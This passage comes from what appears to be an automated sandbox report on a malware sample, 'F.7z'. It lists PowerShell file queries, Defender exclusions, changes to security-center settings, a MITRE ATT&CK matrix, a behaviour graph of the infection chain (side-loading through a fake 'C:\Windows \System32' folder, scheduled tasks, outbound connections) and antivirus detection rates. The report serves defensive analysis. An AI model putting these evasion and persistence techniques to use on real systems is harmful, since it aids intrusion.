    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_64942A90 GetSystemTimeAsFileTime,46_2_64942A90
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEF2860 GetUserNameA,GetLastError,_strdup,46_2_00007FFA2CEF2860
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Lowering of HIPS / PFW / Operating System Security Settings

    barindex
    Changes security center settings (notifications, updates, antivirus, firewall)
    Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
    Source: svchost.exe, 0000000E.00000002.2323835397.0000022F5ED02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
    Source: svchost.exe, 0000000E.00000002.2323835397.0000022F5ED02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
    Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
    Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
    Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
    Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA3312D7E0 bind,WSAGetLastError,51_2_00007FFA3312D7E0
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA330E78B0 memset,strncmp,strncmp,strchr,inet_pton,htons,strtoul,inet_pton,htons,htons,bind,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,51_2_00007FFA330E78B0
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA330FC620 strchr,strchr,inet_pton,strchr,strtoul,strchr,strtoul,memmove,getsockname,WSAGetLastError,inet_ntop,WSAGetLastError,memmove,htons,bind,WSAGetLastError,getsockname,getsockname,listen,WSAGetLastError,htons,51_2_00007FFA330FC620
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA3312D5B2 bind,WSAGetLastError,51_2_00007FFA3312D5B2
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA33126B0D htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,51_2_00007FFA33126B0D
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA33126B40 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,closesocket,51_2_00007FFA33126B40

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information112
    Scripting    		Valid Accounts1
    Windows Management Instrumentation    		112
    Scripting    		1
    DLL Side-Loading    		2
    Disable or Modify Tools    		OS Credential Dumping11
    System Time Discovery    		1
    Exploitation of Remote Services    		12
    Archive Collected Data    		2
    Ingress Tool Transfer    		Exfiltration Over Other Network Medium1
    Data Encrypted for Impact
    CredentialsDomainsDefault Accounts1
    Native API    		1
    DLL Side-Loading    		111
    Windows Service    		1
    Deobfuscate/Decode Files or Information    		LSASS Memory1
    Account Discovery    		Remote Desktop Protocol1
    Data from Local System    		22
    Encrypted Channel    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    Exploitation for Client Execution    		111
    Windows Service    		11
    Process Injection    		2
    Obfuscated Files or Information    		Security Account Manager12
    File and Directory Discovery    		SMB/Windows Admin Shares1
    Clipboard Data    		1
    Non-Standard Port    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal Accounts112
    Command and Scripting Interpreter    		1
    Scheduled Task/Job    		1
    Scheduled Task/Job    		1
    Software Packing    		NTDS34
    System Information Discovery    		Distributed Component Object ModelInput Capture2
    Non-Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud Accounts1
    Scheduled Task/Job    		Network Logon ScriptNetwork Logon Script1
    DLL Side-Loading    		LSA Secrets151
    Security Software Discovery    		SSHKeylogging3
    Application Layer Protocol    		Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable Media1
    Service Execution    		RC ScriptsRC Scripts1
    File Deletion    		Cached Domain Credentials1
    Process Discovery    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote Services2
    PowerShell    		Startup ItemsStartup Items12
    Masquerading    		DCSync51
    Virtualization/Sandbox Evasion    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
    Modify Registry    		Proc Filesystem1
    Application Window Discovery    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt51
    Virtualization/Sandbox Evasion    		/etc/passwd and /etc/shadow1
    System Owner/User Discovery    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
    Process Injection    		Network Sniffing1
    System Network Configuration Discovery    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1501605 Sample: F.7z Startdate: 30/08/2024 Architecture: WINDOWS Score: 100 108 worldtimeapi.org 2->108 110 universalsqlserver.privatelink.postgres.database.azure.com 2->110 112 2 other IPs or domains 2->112 122 Malicious sample detected (through community Yara rule) 2->122 124 Multi AV Scanner detection for dropped file 2->124 126 Multi AV Scanner detection for submitted file 2->126 128 13 other signatures 2->128 12 wscript.exe 1 2->12         started        15 svchost.exe 2->15         started        18 svchost.exe 2->18         started        20 9 other processes 2->20 signatures3 process4 dnsIp5 154 Wscript starts Powershell (via cmd or directly) 12->154 156 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->156 158 Suspicious execution chain found 12->158 23 cmd.exe 6 12->23         started        114 worldtimeapi.org 213.188.196.246, 49729, 80 TELIA-NORWAY-ASTeliaNorwayCoreNetworksNO Italy 15->114 116 universalsqlserver.privatelink.postgres.database.azure.com 20.71.50.126, 49730, 5432 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 15->116 118 ipinfo.io 34.117.59.81, 443, 49726 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 15->118 160 Adds a directory exclusion to Windows Defender 15->160 26 cmd.exe 15->26         started        28 cmd.exe 15->28         started        30 cmd.exe 15->30         started        162 Changes security center settings (notifications, updates, antivirus, firewall) 18->162 32 MpCmdRun.exe 18->32         started        120 127.0.0.1 unknown unknown 20->120 106 C:\Users\user\AppData\Local\...\x249569.dat, PE32+ 20->106 dropped file6 signatures7 process8 signatures9 144 Suspicious powershell command line found 23->144 146 Wscript starts Powershell (via cmd or directly) 23->146 148 Drops executables to the windows directory (C:\Windows) and starts them 23->148 150 Uses schtasks.exe or at.exe to add and modify task schedules 23->150 34 printui.exe 23->34         started        52 7 other processes 23->52 152 Adds a directory exclusion to Windows Defender 26->152 38 powershell.exe 26->38         started        40 conhost.exe 26->40         started        42 powershell.exe 28->42         started        44 conhost.exe 28->44         started        46 powershell.exe 30->46         started        48 conhost.exe 30->48         started        50 conhost.exe 32->50         started        process10 file11 94 C:\Windows\System32\zlib1.dll, PE32+ 34->94 dropped 96 C:\Windows\System32\x338625.dat, PE32+ 34->96 dropped 98 C:\Windows\System32\usvc.dat, PE32+ 34->98 dropped 104 10 other files (8 malicious) 34->104 dropped 130 Adds a directory exclusion to Windows Defender 34->130 132 Suspicious command line found 34->132 54 cmd.exe 34->54         started        57 cmd.exe 34->57         started        59 cmd.exe 34->59         started        61 2 other processes 34->61 134 Loading BitLocker PowerShell Module 38->134 100 C:\Windows \System32\x249569.dat, PE32+ 52->100 dropped 102 C:\Windows \System32\printui.exe, PE32+ 52->102 dropped signatures12 process13 signatures14 136 Suspicious powershell command line found 54->136 138 Wscript starts Powershell (via cmd or directly) 54->138 63 powershell.exe 54->63         started        66 conhost.exe 54->66         started        140 Adds a directory exclusion to Windows Defender 57->140 68 powershell.exe 57->68         started        70 conhost.exe 57->70         started        142 Drops executables to the windows directory (C:\Windows) and starts them 59->142 72 console_zero.exe 59->72         started        74 conhost.exe 59->74         started        76 reg.exe 61->76         started        78 conhost.exe 61->78         started        80 4 other processes 61->80 process15 signatures16 164 Found suspicious powershell code related to unpacking or dynamic code loading 63->164 166 Loading BitLocker PowerShell Module 63->166 168 Multi AV Scanner detection for dropped file 72->168 82 cmd.exe 72->82         started        84 cmd.exe 72->84         started        170 Creates a Windows Service pointing to an executable in C:\Windows 76->170 process17 process18 86 conhost.exe 82->86         started        88 schtasks.exe 82->88         started        90 conhost.exe 84->90         started        92 schtasks.exe 84->92         started       

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    F.7z27%ReversingLabsWin32.Trojan.Malgent
    F.7z32%VirustotalBrowse

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Windows\System32\x338625.dat100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Temp\7zE4809A201\rootdir\x249569.dat54%ReversingLabsWin64.Trojan.Malgent
    C:\Users\user\AppData\Local\Temp\7zE4809A201\rootdir\x249569.dat42%VirustotalBrowse
    C:\Windows \System32\printui.exe0%ReversingLabs
    C:\Windows \System32\printui.exe0%VirustotalBrowse
    C:\Windows \System32\x249569.dat54%ReversingLabsWin64.Trojan.Malgent
    C:\Windows \System32\x249569.dat42%VirustotalBrowse
    C:\Windows\System32\console_zero.exe75%ReversingLabsWin64.Trojan.CrypterX
    C:\Windows\System32\console_zero.exe72%VirustotalBrowse
    C:\Windows\System32\libcrypto-3-x64.dll0%ReversingLabs
    C:\Windows\System32\libcrypto-3-x64.dll0%VirustotalBrowse
    C:\Windows\System32\libcurl.dll0%ReversingLabs
    C:\Windows\System32\libcurl.dll0%VirustotalBrowse
    C:\Windows\System32\libiconv-2.dll0%ReversingLabs
    C:\Windows\System32\libiconv-2.dll0%VirustotalBrowse
    C:\Windows\System32\libintl-9.dll0%ReversingLabs
    C:\Windows\System32\libintl-9.dll0%VirustotalBrowse
    C:\Windows\System32\libpq.dll0%ReversingLabs
    C:\Windows\System32\libpq.dll0%VirustotalBrowse
    C:\Windows\System32\libssl-3-x64.dll0%ReversingLabs
    C:\Windows\System32\libssl-3-x64.dll0%VirustotalBrowse
    C:\Windows\System32\libwinpthread-1.dll0%ReversingLabs
    C:\Windows\System32\libwinpthread-1.dll0%VirustotalBrowse
    C:\Windows\System32\ucrtbased.dll0%ReversingLabs
    C:\Windows\System32\ucrtbased.dll0%VirustotalBrowse
    C:\Windows\System32\usvc.dat96%ReversingLabsWin64.Trojan.Generic
